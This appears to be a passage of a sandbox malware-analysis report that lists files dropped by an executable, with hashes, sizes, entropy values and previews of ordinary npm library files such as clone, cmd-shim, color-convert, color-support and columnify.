              SHA-512:992FD83B6968D6B296A35FBC5C236AD9491292C6B62E857005C55E1E65F94543117A33D14087327DE4A676488364867070B7F24A022273C05FB6013E599F0793
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-8"?>.<module type="WEB_MODULE" version="4">. <component name="NewModuleRootManager" inherit-compiler-output="true">. <exclude-output />. <content url="file://$MODULE_DIR$" />. <orderEntry type="inheritedJdk" />. <orderEntry type="sourceFolder" forTests="false" />. <orderEntry type="library" name="clone node_modules" level="project" />. </component>.</module>
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4389
              Entropy (8bit):4.7222080246061
              Encrypted:false
              SSDEEP:
              MD5:353B4CB32A4561967C96F8886E5EFAFB
              SHA1:68936085F4D6CBE66717F019C969566F79CC5F6F
              SHA-256:27B2DB27FAFE0F8E35245D81F72AE6523132CE3FAE68E4413953D888F62013A9
              SHA-512:7AB67C699F0580DF7763F6CDFD89D1FE86B4B0B521A280418736D95724A7CCD00593B0792A353EAB32C203A57AD5222E740E025B3C98B1DBD763800509DC2D58
              Malicious:false
              Reputation:unknown
              Preview:var clone = (function() {.'use strict';../**. * Clones (copies) an Object using deep copying.. *. * This function supports circular references by default, but if you are certain. * there are no circular references in your object, you can save some CPU time. * by calling clone(obj, false).. *. * Caution: if `circular` is false and `parent` contains circular references,. * your program may enter an infinite loop and crash.. *. * @param `parent` - the object to be cloned. * @param `circular` - set to true if the object to be cloned may contain. * circular references. (optional - true by default). * @param `depth` - set to a number if the object is only to be cloned to. * a particular depth. (optional - defaults to Infinity). * @param `prototype` - sets the prototype to be used when cloning an object.. * (optional - defaults to parent prototype)..*/.function clone(parent, circular, depth, prototype) {. var filter;. if (typeof circular === 'object') {. depth = circular.depth;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1632
              Entropy (8bit):5.00777762804705
              Encrypted:false
              SSDEEP:
              MD5:D84EF945AADB5F5A32B301DC6FEF6CCE
              SHA1:AFF949171735D4627CCF32E41C14EB18D64EBC00
              SHA-256:051D07CF7545F11F9CEE76E2F532966E08F064180A0E0A6A949FF474F3CF4A9B
              SHA-512:D37EC75E55571BE1704289CF109FA954512482317AE1D05C4857EC617BECCCF0CE2D11E854CDF9E6102A35268C901465A080DA758553B37EAE812CB36C313043
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "clone",. "description": "deep cloning of objects and arrays",. "tags": [. "clone",. "object",. "array",. "function",. "date". ],. "version": "1.0.4",. "repository": {. "type": "git",. "url": "git://github.com/pvorb/node-clone.git". },. "bugs": {. "url": "https://github.com/pvorb/node-clone/issues". },. "main": "clone.js",. "author": "Paul Vorbach <paul@vorba.ch> (http://paul.vorba.ch/)",. "contributors": [. "Blake Miner <miner.blake@gmail.com> (http://www.blakeminer.com/)",. "Tian You <axqd001@gmail.com> (http://blog.axqd.net/)",. "George Stagas <gstagas@gmail.com> (http://stagas.com/)",. "Tobiasz Cudnik <tobiasz.cudnik@gmail.com> (https://github.com/TobiaszCudnik)",. "Pavel Lang <langpavel@phpskelet.org> (https://github.com/langpavel)",. "Dan MacTough (http://yabfog.com/)",. "w1nk (https://github.com/w1nk)",. "Hugh Kennedy (http://twitter.com/hughskennedy)",. "Dustin Diaz (http://dustindiaz.com)",. "Ilya Sha
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):756
              Entropy (8bit):4.9882298375740355
              Encrypted:false
              SSDEEP:
              MD5:FF53DF3AD94E5C618E230AB49CE310FA
              SHA1:A0296AF210B0F3DC0016CB0CEEE446EA4B2DE70B
              SHA-256:EC361617C0473D39347B020EAA6DCEEDAEBAB43879FA1CD8B8F0F97A8E80A475
              SHA-512:876B0BD6A10F852661818D5048543BB37389887BF721016B6B7D1FA6D59D230D06F8FF68A59A59F03C25FBC80A2CBB210E7CA8179F111ECD10929B25B3D5CDFE
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) npm, Inc. and Contributors..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7706
              Entropy (8bit):5.007951538984679
              Encrypted:false
              SSDEEP:
              MD5:E43071832CBFAAEA428DD94EE32C3D19
              SHA1:A48B81855B5AE8CB260F31D3EB5B32462341BA48
              SHA-256:3A1DB532D2E8CD5C5E545D7DC92C917FD765BBD91BAE5FC150C101F51BA5DB5F
              SHA-512:FA9A6FB767270AB5DABA0771F8F0438A12E309A2617CA0D788B04FB250D951BCBBEDA3646331FAD003F44664E752069C647CEF6F3B0FD0597B964E5396B5A675
              Malicious:false
              Reputation:unknown
              Preview:// On windows, create a .cmd file..// Read the #! in the file to see what it uses. The vast majority.// of the time, this will be either:.// "#!/usr/bin/env <prog> <args...>".// or:.// "#!<prog> <args...>".//.// Write a binroot/pkg.bin + ".cmd" file that has this line in it:.// @<prog> <args...> %dp0%<target> %*..const {. chmod,. mkdir,. readFile,. stat,. unlink,. writeFile,.} = require('fs/promises')..const { dirname, relative } = require('path').const toBatchSyntax = require('./to-batch-syntax').// linting disabled because this regex is really long.// eslint-disable-next-line max-len.const shebangExpr = /^#!\s*(?:\/usr\/bin\/env\s+(?:-S\s+)?((?:[^ \t=]+=[^ \t=]+\s+)*))?([^ \t]+)(.*)$/..const cmdShimIfExists = (from, to) =>. stat(from).then(() => cmdShim(from, to), () => {})..// Try to unlink, but ignore errors..// Any problems will surface later..const rm = path => unlink(path).catch(() => {})..const cmdShim = (from, to) =>. stat(from).then(() => cmdShim_(from, to))..const c
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1558
              Entropy (8bit):4.962295052129568
              Encrypted:false
              SSDEEP:
              MD5:83E9CB151A53CC9D5DC8A6C4B1E6F401
              SHA1:9A7F53EEA8DBD8D7347BBC3013634874230BAF2F
              SHA-256:E39A03DAC6E5E31C6C4BB58FAB2C23E8AEEAACD53E0B8C63E742FE7F4EF476EC
              SHA-512:F94C3332F587F3BE2F2D43B4DFBE3045A557A5AE3CF26014CDB3E16051DC01DC61F83DB0477FB5756C034B28ABD0E1EE5C5083B18A779FABCDEAD677CD5579D7
              Malicious:false
              Reputation:unknown
              Preview:exports.replaceDollarWithPercentPair = replaceDollarWithPercentPair..exports.convertToSetCommand = convertToSetCommand..exports.convertToSetCommands = convertToSetCommands....function convertToSetCommand (key, value) {.. var line = ''.. key = key || ''.. key = key.trim().. value = value || ''.. value = value.trim().. if (key && value && value.length > 0) {.. line = '@SET ' + key + '=' + replaceDollarWithPercentPair(value) + '\r\n'.. }.. return line..}....function extractVariableValuePairs (declarations) {.. var pairs = {}.. declarations.map(function (declaration) {.. var split = declaration.split('=').. pairs[split[0]] = split[1].. }).. return pairs..}....function convertToSetCommands (variableString) {.. var variableValuePairs = extractVariableValuePairs(variableString.split(' ')).. var variableDeclarationsAsBatch = ''.. Object.keys(variableValuePairs).forEach(function (key) {.. variableDeclarationsAsBatch += convertToSetCommand(key, variableValuePairs[key])
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1135
              Entropy (8bit):4.7053215297422835
              Encrypted:false
              SSDEEP:
              MD5:8C6827B6B3D4A9A757F784F89C0E23C4
              SHA1:2B3A6873A434448B80E202F1194D22D3BBD2E672
              SHA-256:547D67F0E63C88EC546B5BDEAD304E4D81833CC12BE841F79AF51FD9F209E060
              SHA-512:9525AB8CC1294F0E6D97BB56B90308027384B8D565473914548105B12FFAD5980330C4E24F04DA4FB0E3786520BEA37B7221BF904B56AFA93C2D3A53DA2CF34D
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "cmd-shim",. "version": "6.0.2",. "description": "Used in npm for command line application support",. "scripts": {. "test": "tap",. "snap": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint". },. "repository": {. "type": "git",. "url": "https://github.com/npm/cmd-shim.git". },. "license": "ISC",. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.19.0",. "tap": "^16.0.1". },. "files": [. "bin/",. "lib/". ],. "main": "lib/index.js",. "tap": {. "before": "test/00-setup.js",. "after": "test/zz-cleanup.js",. "check-coverage": true,. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "author": "GitHub Inc.",. "templateOSS": {. "//@npmcli/template-oss": "
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1087
              Entropy (8bit):5.1461715876396905
              Encrypted:false
              SSDEEP:
              MD5:9BDADFC9FBB3AB8D5A6D591BDBD52811
              SHA1:2CB896D3773ACC17B0F87DBB47759DFDE011841B
              SHA-256:693866FC419C6F61C8570438EC00659D156EC2B4D4A4D04091711F5F11A365D4
              SHA-512:449FBDF7888A5B9088B5F84AA6D1A42CF951782A062079F63FE5E1E797E709ED4737C3E19300D0A98A01013431E73652C5B81438913BA952FF1FB63BCE460E5B
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2011-2016 Heather Arthur <fayearthur@gmail.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OU
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):17040
              Entropy (8bit):5.158907989452926
              Encrypted:false
              SSDEEP:
              MD5:321A8A9EFC224622CCA13FAE1B954A1D
              SHA1:A05AABA7FA837594B8D939B6C47B5CEF148A1773
              SHA-256:7225058075157FC78115B8BE998A2EFFDFC1E5B3316B004A130EE5F19303574B
              SHA-512:D1DBAAB34145159F6B9CDF552F24A4E817E98369D330B7CAD8D28D9A71DDE33601D57F36E0E6CBADAFEE8A3DF4DAC525F7A47D164F262FE8AFDF0DD1F0847ABC
              Malicious:false
              Reputation:unknown
              Preview:/* MIT license */./* eslint-disable no-mixed-operators */.const cssKeywords = require('color-name');..// NOTE: conversions should only return primitive values (i.e. arrays, or.// values that give correct `typeof` results)..// do not use box values types (i.e. Number(), String(), etc.)..const reverseKeywords = {};.for (const key of Object.keys(cssKeywords)) {..reverseKeywords[cssKeywords[key]] = key;.}..const convert = {..rgb: {channels: 3, labels: 'rgb'},..hsl: {channels: 3, labels: 'hsl'},..hsv: {channels: 3, labels: 'hsv'},..hwb: {channels: 3, labels: 'hwb'},..cmyk: {channels: 4, labels: 'cmyk'},..xyz: {channels: 3, labels: 'xyz'},..lab: {channels: 3, labels: 'lab'},..lch: {channels: 3, labels: 'lch'},..hex: {channels: 1, labels: ['hex']},..keyword: {channels: 1, labels: ['keyword']},..ansi16: {channels: 1, labels: ['ansi16']},..ansi256: {channels: 1, labels: ['ansi256']},..hcg: {channels: 3, labels: ['h', 'c', 'g']},..apple: {channels: 3, labels: ['r16', 'g16', 'b16']},.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1708
              Entropy (8bit):4.930190221851417
              Encrypted:false
              SSDEEP:
              MD5:6174D1641FAE837A527F69C1A16D0F1C
              SHA1:0660BAD6704F1EC15ECE242A7A15A7721EF727BE
              SHA-256:ADB610F9A2FBBA92548161871075262496B563DCD0E5E8F5C20F562160A74B34
              SHA-512:FB2BD0916B04C64593856912B1A45034D575A7619DF1E2F495712B11DFDD9A78F7D8A290DFC8785DDC1978C623057687836C6E460DBE62AB8C2A9874452ADA59
              Malicious:false
              Reputation:unknown
              Preview:const conversions = require('./conversions');.const route = require('./route');..const convert = {};..const models = Object.keys(conversions);..function wrapRaw(fn) {..const wrappedFn = function (...args) {...const arg0 = args[0];...if (arg0 === undefined || arg0 === null) {....return arg0;...}....if (arg0.length > 1) {....args = arg0;...}....return fn(args);..};...// Preserve .conversion property if there is one..if ('conversion' in fn) {...wrappedFn.conversion = fn.conversion;..}...return wrappedFn;.}..function wrapRounded(fn) {..const wrappedFn = function (...args) {...const arg0 = args[0];....if (arg0 === undefined || arg0 === null) {....return arg0;...}....if (arg0.length > 1) {....args = arg0;...}....const result = fn(args);....// We're assuming the result is an array here....// see notice in conversions.js; don't use box types...// in conversion functions....if (typeof result === 'object') {....for (let len = result.length, i = 0; i < len; i++) {.....result[i] = Math.round(resul
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):827
              Entropy (8bit):4.462043253780675
              Encrypted:false
              SSDEEP:
              MD5:370B0177FDB4368F0A688FFA48559ECF
              SHA1:03F26AB8597E0117B7AD15BCFA9F0B31C8375EA9
              SHA-256:9471D21744CA3137410448DA6B3BD7B30EE91D42EDCE3B82EBCBF84FAEF74FB4
              SHA-512:DA2D40A90EB81EE2FD0F2ADD4293F43902903711AF0A64C16A7D78E20913842C4FB0CA62C04C4D92CEB2703A966423D962FA60FB4181FC213D99F1A0B4339297
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "color-convert",. "description": "Plain color conversion functions",. "version": "2.0.1",. "author": "Heather Arthur <fayearthur@gmail.com>",. "license": "MIT",. "repository": "Qix-/color-convert",. "scripts": {. "pretest": "xo",. "test": "node test/basic.js". },. "engines": {. "node": ">=7.0.0". },. "keywords": [. "color",. "colour",. "convert",. "converter",. "conversion",. "rgb",. "hsl",. "hsv",. "hwb",. "cmyk",. "ansi",. "ansi16". ],. "files": [. "index.js",. "conversions.js",. "route.js". ],. "xo": {. "rules": {. "default-case": 0,. "no-inline-comments": 0,. "operator-linebreak": 0. }. },. "devDependencies": {. "chalk": "^2.4.2",. "xo": "^0.24.0". },. "dependencies": {. "color-name": "~1.1.4". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2257
              Entropy (8bit):4.955745003178248
              Encrypted:false
              SSDEEP:
              MD5:FF30F2B9F4A3761BE9D12787F059F625
              SHA1:01005D1F2B540C4DF7E02FB7AC06C60BA3BAE371
              SHA-256:5F1420AF4A106EAA68ED7B4BB5E46F47E0F251169E38841EC8262447E4691B5D
              SHA-512:141F74F51EE662FC5A263E0CB193C47C8EB66201A27DD1A146D253EFB413684C7107E3910A02167DE8C649693929FE1781F79A6783D6115E2CA17B7ADEF9C594
              Malicious:false
              Reputation:unknown
              Preview:const conversions = require('./conversions');../*..This function routes a model to all other models....all functions that are routed have a property `.conversion` attached..to the returned synthetic function. This property is an array..of strings, each with the steps in between the 'from' and 'to'..color models (inclusive)....conversions that are not possible simply are not included..*/..function buildGraph() {..const graph = {};..// https://jsperf.com/object-keys-vs-for-in-with-closure/3..const models = Object.keys(conversions);...for (let len = models.length, i = 0; i < len; i++) {...graph[models[i]] = {....// http://jsperf.com/1-vs-infinity....// micro-opt, but this is simple.....distance: -1,....parent: null...};..}...return graph;.}..// https://en.wikipedia.org/wiki/Breadth-first_search.function deriveBFS(fromModel) {..const graph = buildGraph();..const queue = [fromModel]; // Unshift -> queue -> pop...graph[fromModel].distance = 0;...while (queue.length) {...const current = queue
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (460), with CRLF line terminators
              Category:dropped
              Size (bytes):1085
              Entropy (8bit):5.088650631742458
              Encrypted:false
              SSDEEP:
              MD5:D301869B39E08B33665B7C4F16B8E41D
              SHA1:E8BC789B6DC24E4C3FC4D208364DD6B029A81EB1
              SHA-256:C064F7A3E353BC1BC977F3C897941C75EF763F44F41677E0A15370CA0853D6E2
              SHA-512:FC1D65352C114C7594C9BEDF5BE432BA39D426FEAF50BF8F7C52D32781323C84BFC9A68531AEFB558C97EBE46E712E1D35D860BA1E1A6AB48B4A79B894092540
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2015 Dmitry Ivanov....Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:....The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.....THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OU
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4617
              Entropy (8bit):4.906237132045593
              Encrypted:false
              SSDEEP:
              MD5:405840EC3052209F357288FE4C0F4414
              SHA1:DB20105DC898FA8AA6706492502431C680C0DC94
              SHA-256:97DABD7EBB70C33C19CCFA6956377FC722D9769924903F42A3BEDE30D83A8592
              SHA-512:9DE93EE7B458A9D6B97664022909AD25A7CB89C2CFDD8EE19AA2E126566B7A7A930B24143A2A76F83DBFF19F1A67B0A71DE93E8AB248720C2EE243396E869451
              Malicious:false
              Reputation:unknown
              Preview:'use strict'....module.exports = {..."aliceblue": [240, 248, 255],..."antiquewhite": [250, 235, 215],..."aqua": [0, 255, 255],..."aquamarine": [127, 255, 212],..."azure": [240, 255, 255],..."beige": [245, 245, 220],..."bisque": [255, 228, 196],..."black": [0, 0, 0],..."blanchedalmond": [255, 235, 205],..."blue": [0, 0, 255],..."blueviolet": [138, 43, 226],..."brown": [165, 42, 42],..."burlywood": [222, 184, 135],..."cadetblue": [95, 158, 160],..."chartreuse": [127, 255, 0],..."chocolate": [210, 105, 30],..."coral": [255, 127, 80],..."cornflowerblue": [100, 149, 237],..."cornsilk": [255, 248, 220],..."crimson": [220, 20, 60],..."cyan": [0, 255, 255],..."darkblue": [0, 0, 139],..."darkcyan": [0, 139, 139],..."darkgoldenrod": [184, 134, 11],..."darkgray": [169, 169, 169],..."darkgreen": [0, 100, 0],..."darkgrey": [169, 169, 169],..."darkkhaki": [189, 183, 107],..."darkmagenta": [139, 0, 139],..."darkolivegreen": [85, 107, 47],..."darkorange": [255, 140, 0],..."darkorchid": [153, 50, 204],
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):607
              Entropy (8bit):4.684474967405876
              Encrypted:false
              SSDEEP:
              MD5:EF649E8B7BE42BBA6D4FA34ACA7E126A
              SHA1:411D7C87D5B1DEC0D479AA13E3406B5C38AC34F5
              SHA-256:4A557EA373907E4643BADB89FF21B3F4B969D20631086D78EAB2E03D05C2EFA4
              SHA-512:1390AB3DE4CD21A6407EDC2A309A644FC3C335A994254AEE6C72D367A4639F797D46F24A48BC3A3065D3E9201C44757796D2CE49339AD47BE443BFC650EA1A1F
              Malicious:false
              Reputation:unknown
              Preview:{.. "name": "color-name",.. "version": "1.1.4",.. "description": "A list of color names and its values",.. "main": "index.js",.. "files": [.. "index.js".. ],.. "scripts": {.. "test": "node test.js".. },.. "repository": {.. "type": "git",.. "url": "git@github.com:colorjs/color-name.git".. },.. "keywords": [.. "color-name",.. "color",.. "color-keyword",.. "keyword".. ],.. "author": "DY <dfcreative@gmail.com>",.. "license": "MIT",.. "bugs": {.. "url": "https://github.com/colorjs/color-name/issues".. },.. "homepage": "https://github.com/colorjs/color-name"..}..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):127
              Entropy (8bit):4.884251265065465
              Encrypted:false
              SSDEEP:
              MD5:8992F6C36C7C0A8235EE07694694E7CF
              SHA1:963767ADC579A51EFD3722F8BE3C6257C48DB3F5
              SHA-256:A797F6FEA8A46F7ADF24FB22DB2C880E8202587094BEA0F83029C81C66FB7048
              SHA-512:9BBB024879AD71980E67C982449100C8CD6B1420EE97D11BBD1E0D49E9BADDBC51C89AF2A7B08CFAC92E09D934C735A9DA1E721977F555A2158EF4DC1F0125EB
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node.var colorSupport = require('./')({alwaysReturn: true }).console.log(JSON.stringify(colorSupport, null, 2)).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):299
              Entropy (8bit):4.63463708448563
              Encrypted:false
              SSDEEP:
              MD5:2FB21D73D3D22C7A3F9F0256BFA01CBB
              SHA1:E39DECE49FD6F7410FA20DA197132F991A2C1A30
              SHA-256:A0532D349B9B40BB943268E6739E627C5B38A1C8D8365ABA531C7B037ECC5540
              SHA-512:B011D8FCDE97A850D5E9BB902582C42BBF69B822036AFE0E8780CFDEA0D96114355DF41F42499B37D3CA7D220248CE8022352AD261DA11CC72D51FFE8C7B302C
              Malicious:false
              Reputation:unknown
              Preview:module.exports = colorSupport({ alwaysReturn: true }, colorSupport)..function colorSupport(options, obj) {. obj = obj || {}. options = options || {}. obj.level = 0. obj.hasBasic = false. obj.has256 = false. obj.has16m = false. if (!options.alwaysReturn) {. return false. }. return obj.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2644
              Entropy (8bit):4.831569323957088
              Encrypted:false
              SSDEEP:
              MD5:3B42FF5BA9CDD245B3572A0FC356EDBD
              SHA1:25530A33C89CA0339856A7BB5A242082877A6526
              SHA-256:A6F7EE23BA6076142570631A197FAF48E749D21140D37DA2B3B447DA20476ED1
              SHA-512:4D50E6751CF13814FC050A73E6DF93513724E310A070D895E96BB5960200A6355B98C15DEABDF30B2BD8283607E724547C73FE90D6B994F5628C6E5E4B744E4F
              Malicious:false
              Reputation:unknown
              Preview:// call it on itself so we can test the export val for basic stuff.module.exports = colorSupport({ alwaysReturn: true }, colorSupport)..function hasNone (obj, options) {. obj.level = 0. obj.hasBasic = false. obj.has256 = false. obj.has16m = false. if (!options.alwaysReturn) {. return false. }. return obj.}..function hasBasic (obj) {. obj.hasBasic = true. obj.has256 = false. obj.has16m = false. obj.level = 1. return obj.}..function has256 (obj) {. obj.hasBasic = true. obj.has256 = true. obj.has16m = false. obj.level = 2. return obj.}..function has16m (obj) {. obj.hasBasic = true. obj.has256 = true. obj.has16m = true. obj.level = 3. return obj.}..function colorSupport (options, obj) {. options = options || {}.. obj = obj || {}.. // if just requesting a specific level, then return that.. if (typeof options.level === 'number') {. switch (options.level) {. case 0:. return hasNone(obj, options). case 1:. return hasBasic(obj). case
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):816
              Entropy (8bit):4.656350362403703
              Encrypted:false
              SSDEEP:
              MD5:B1C3FAE9AB1D7FB995EAD4D841D60D2A
              SHA1:A47D93A86D7864EB1866A3367F7C5ACE53DC18D1
              SHA-256:BAF5CCA1519CFAA530A21810BDA9FE6236082D855A59FF66F5EF437BF51451EB
              SHA-512:0DE27E397E8BE0A69A8185834EC440AB8F24C8F3A82C0FBF4B6B4CF4A144C7B0DFA13FE1B97E8C5AE63A0FDA32D8F9F959A61C44D605841163B34A2248917AB5
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "color-support",. "version": "1.1.3",. "description": "A module which will endeavor to guess your terminal's level of color support.",. "main": "index.js",. "browser": "browser.js",. "bin": "bin.js",. "devDependencies": {. "tap": "^10.3.3". },. "scripts": {. "test": "tap test/*.js --100 -J",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --all; git push origin --tags". },. "repository": {. "type": "git",. "url": "git+https://github.com/isaacs/color-support.git". },. "keywords": [. "terminal",. "color",. "support",. "xterm",. "truecolor",. "256". ],. "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)",. "license": "ISC",. "files": [. "browser.js",. "index.js",. "bin.js". ].}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1076
              Entropy (8bit):5.1048386886385435
              Encrypted:false
              SSDEEP:
              MD5:08307CA687A9024E20C568930D2FC768
              SHA1:5912191FF3993E5BE32F7901B08C6504A897748B
              SHA-256:663B13CC23087AE9CA076A7F9205FB9692A96A701308CAFB4DC219F6551AD902
              SHA-512:C50BE86DDC4FB7AC7BFF1768510AFD178BCD7C63C22CCB5F03BABF3E385A2EE09722EA2000332628459F75D0D7904AB8FD82377BD43460B290FC1BAC7F04619C
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2013 Tim Oxley..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:makefile script, ASCII text
              Category:dropped
              Size (bytes):128
              Entropy (8bit):4.6335608404992685
              Encrypted:false
              SSDEEP:
              MD5:5355C8674096804066FD4E6C161B5F45
              SHA1:41B27B5C8426CA4ED9E44DC158B116ADA56BC5F5
              SHA-256:11B020FB89F1C8ECB6825D6A898532D19E55C6363611551075A318617DE521F7
              SHA-512:68FAC1B930961D23FA58FE4BE18357E759410EF5E37739C5ACF6E9557EA412478AF2847A2C7B85183E3611F09A8DF9391EBC127908986B333277146193679775
              Malicious:false
              Reputation:unknown
              Preview:.all: columnify.js..prepublish: all..columnify.js: index.js package.json..babel index.js > columnify.js...PHONY: all prepublish.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):10150
              Entropy (8bit):4.910712036830618
              Encrypted:false
              SSDEEP:
              MD5:49542B554EC85DB30B5CD17DDF89592F
              SHA1:C4BCCB356B3D8D0EE40E2E489A2808A9832398A8
              SHA-256:7FF2B362D1BC6F7DC889D76CEAA4AFBA76CE9017D96920C2AA922FDA9F10077A
              SHA-512:075932D5E95FCA7A915F0F068380205FF40F4D7CB6D7726C868A108363A1F1F744D3223B3B439C17E875284646EB9346217D7E51C740D626BFF79280A8128BD4
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..var wcwidth = require('./width');..var _require = require('./utils'),. padRight = _require.padRight,. padCenter = _require.padCenter,. padLeft = _require.padLeft,. splitIntoLines = _require.splitIntoLines,. splitLongWords = _require.splitLongWords,. truncateString = _require.truncateString;..var DEFAULT_HEADING_TRANSFORM = function DEFAULT_HEADING_TRANSFORM(key) {. return key.toUpperCase();.};..var DEFAULT_DATA_TRANSFORM = function DEFAULT_DATA_TRANSFORM(cell, column, index) {. return cell;.};..var DEFAULTS = Object.freeze({. maxWidth: Infinity,. minWidth: 0,. columnSplitter: ' ',. truncate: false,. truncateMarker: '.',. preserveNewLines: false,. paddingChr: ' ',. showHeaders: true,. headingTransform: DEFAULT_HEADING_TRANSFORM,. dataTransform: DEFAULT_DATA_TRANSFORM.});..module.exports = function (items) {. var options = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};... var columnConfigs = options.config || {};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
